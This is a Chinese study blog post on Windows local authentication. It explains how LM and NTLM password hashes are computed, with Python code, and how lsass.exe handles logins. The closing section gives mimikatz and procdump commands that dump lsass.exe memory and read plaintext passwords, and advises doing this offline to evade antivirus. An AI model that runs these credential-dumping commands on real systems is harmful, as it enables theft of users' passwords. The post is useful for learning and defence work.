仅记录学习笔记,参考网上各位前辈的文章讲解加上个人理解。如有错误,请及时提醒,以免误导他人。
Windows本地登陆密码储存在位于%SystemRoot%\system32\config\目录的SAM文件中,存储内容为密码的hash值。当用户输入密码时,Windows先将用户的输入通过算法加密再与SAM文件存储的数据对比,一致则认证成功。
Windows所使用的密码hash有两种,LM Hash与NTLM hash。
0x00 LM Hash
LM 全称LAN Manager ,LM hash作为Windows使用较早的认证协议,现已基本淘汰,仅存在于较老的系统中,如Windows XP、Windows 2000、Windows 2003这一类。
LM hash算法如下:
- 将密码转换为大写,并转换为
16进制字符串。 - 密码不足
28位,用0在右边补全。 28位的密码被分成两个14位部分,每部分分别转换成比特流,并且长度为56位,长度不足用0在左边补齐长度。- 两组分别再分
7位一组末尾加0,再组合成一段新的字符,再转为16进制。 - 两组
16进制数,分别作为DES key为KGS!@#$%进行加密。 - 将两组
DES加密后的编码拼接,得到LM HASH值。
Python3实现LM hash算法:
import binascii import codecs from pyDes import * def DesEncrypt(Key, str): k = des(str, ECB, pad=None) EncryptStr = k.encrypt(Key) return binascii.b2a_hex(EncryptStr) def ZeroPadding(str): b = [] l = len(str) num = 0 for n in range(l): if (num < 8) and n % 7 == 0: b.append(str[n:n + 7] + '0') num = num + 1 return ''.join(b) if __name__ == "__main__": passwd = sys.argv[1] print('你的输入是:', passwd) print('转化为大写:', passwd.upper()) # 用户的密码转换为大写,并转换为16进制字符串 passwd = codecs.encode(passwd.upper().encode(), 'hex_codec') print('转为hex:', passwd.decode()) # 密码不足28位,用0在右边补全 passwd_len = len(passwd) if passwd_len < 28: passwd = passwd.decode().ljust(28, '0') print('补齐28位:', passwd) # 28位的密码被分成两个14位部分 PartOne = passwd[0:14] PartTwo = passwd[14:] print('两组14位的部分:', PartOne, PartTwo) # 每部分分别转换成比特流,并且长度为56位,长度不足用0在左边补齐长度 PartOne = bin(int(PartOne, 16)).lstrip('0b').rjust(56, '0') PartTwo = bin(int(PartTwo, 16)).lstrip('0b').rjust(56, '0') print('两组56位比特流:', PartOne, PartTwo) # 两组分别再分为7位一组末尾加0,再分别组合成新的字符 PartOne = ZeroPadding(PartOne) PartTwo = ZeroPadding(PartTwo) print('两组再7位一组末尾加0:', PartOne, PartTwo) # 两组数据转hex PartOne = hex(int(PartOne, 2))[2:] PartTwo = hex(int(PartTwo, 2))[2:] if '0' == PartTwo: PartTwo = "0000000000000000" print('两组转为hex:', PartOne, PartTwo) # 16位的二组数据,分别作为DES key为"KGS!@#$%"进行加密。 LMOne = DesEncrypt("KGS!@#$%", binascii.a2b_hex(PartOne)).decode() LMTwo = DesEncrypt("KGS!@#$%", binascii.a2b_hex(PartTwo)).decode() print('两组DES加密结果:', LMOne, LMTwo) # 将二组DES加密后的编码拼接,得到LM HASH值。 LM = LMOne + LMTwo print('LM hash:', LM)
代码参考:https://xz.aliyun.com/t/2445
当密码为123ABC或123456时如下:
LM Hash的脆弱点在于:
DES Key是固定的KGS!@#$%,也就是说是可逆的。- 根据以上的图,也可以发现当我们的密码不超过
7位时,生成的LM hash后面的一半是固定的为aad3b435b51404ee,也就是说通过观察LM hash,够判断用户的密码是否是大于等于7位。
0x01 NTLM Hash
NTLM全称NT LAN Manager, 目前Windows基本都使用NTLM hash。
NTLM hash算法如下:
- 将用户输入转为
16进制 - 再经
Unicode编码 - 再调用
MD4加密算法
Python2实现NTLM hash算法:
# coding=utf-8 import codecs import sys from Crypto.Hash import MD4 def UnicodeEncode(str): b = [] l = int(len(str) / 2) for i in range(l): b.append((str[i * 2:2 * i + 2]) + '00') return ''.join(b) def Md4Encode(str): h = MD4.new() h.update(str.decode('hex')) return h.hexdigest() if __name__ == '__main__': passwd = sys.argv[1] print('Input: ' + passwd) # 转hex passwd = codecs.encode(passwd.encode(), 'hex_codec').decode() print('Hex: ' + passwd) # 转Unicode passwd = UnicodeEncode(passwd) print('Unicode: ' + passwd) # 转md4 NTLMhash = Md4Encode(passwd) print('NTLMhash: ' + NTLMhash)
例如admin经NTLM hash后存储的值便是209c6174da490caeb422f3fa5a7ae634。
0x02 本地认证流程
简洁的描述一下大致流程,当然实际上会复杂很多。
用户通过winlogon.exe输入密码,lsass.exe进程接收密码明文后,会存在内存之中并将其加密成NTML hash,再对SAM存储数据进行比较认证。
graph TD
A[winlogon.exe]-->B(User input)
B-->C[lsass.exe]-->D{转为NTLM hash与SAM文件对比}
D-->|相等|E(认证成功)
D-->|不相等|F(认证失败)
0x03 procdump+mimikatz读取密码
介绍完windows本地认证机制,可以发现在 lsass.exe进程中是会存在有明文密码的,于是可以直接使用mimikatz读取,但是这样通常会被拦截
mimikatz.exe log "privilege::debug" "sekurlsa::logonPasswords full" exit
所以可以利用工具procdump将lsass.exe dump出来,拉到没有杀软的机器里面使用mimikatz读取密码。
procdump64.exe -accepteula -ma lsass.exe lsass.dump
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
如有侵权请联系:admin#unsafe.sh